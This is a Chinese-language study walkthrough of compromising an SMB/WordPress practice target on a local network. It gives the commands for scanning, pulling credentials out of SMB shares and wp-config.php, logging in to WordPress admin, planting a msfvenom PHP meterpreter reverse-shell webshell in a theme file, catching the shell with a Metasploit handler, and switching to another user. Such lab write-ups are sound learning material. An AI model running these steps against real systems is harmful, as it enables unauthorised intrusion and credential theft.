SMB滲透學習過程
1.SMB介紹
SMB(全稱是Server Message Block)是一個協議名,它能被用於Web連接和客戶端與服務器之間的信息溝通。SMB最初是IBM的貝瑞·費根鮑姆(Barry Feigenbaum)研製的,其目的是將DOS操作系統中的本地文件接口“中斷13”改造爲網絡文件系統。
百度百科
準備條件:kali 攻擊機:192.168.31.101
靶場: 192.168.31.62
2.探測過程
(1)使用netdiscover -r 192.168.31.1/24(子網掩碼)
探測到局域網內的靶場地址爲:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶場地址)
探測靶場開放的服務
nmap指令詳解
nmap -A -v -T4 192.168.31.62
針對smb協議弱點分析:使用smbclient -L 192.168.31.62
get deets.txt
到桌面,然後打開另一個終端,在桌面打開deets.txt
查看wp-config.php
cd/wordpress
get wp-config.php
gedit wp-config.php
使用mysql嘗試連接
mysql 192.168.31.62 -u Admin -p
password : 粘貼密碼
ssh [email protected]
粘貼密碼
兩種方式都失敗
又因開啓了http協議則使用dirb http:192.168.31.62
找到wp-admin鏈接並打開
打開鏈接後使用賬號密碼登錄,登錄成功界面
製作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw
複製產生代碼到本地
gedit shell.php
啓動監聽
msfconsole
設置參數
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻擊機地址)
run
啓動成功,等待連接
上傳webshell代碼
提交後瀏覽器輸入訪問點
192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php
連接成功:
cat /etc/passwd
發現togie用戶
切換到togie用戶,密碼爲12345
提升權限
視頻教程鏈接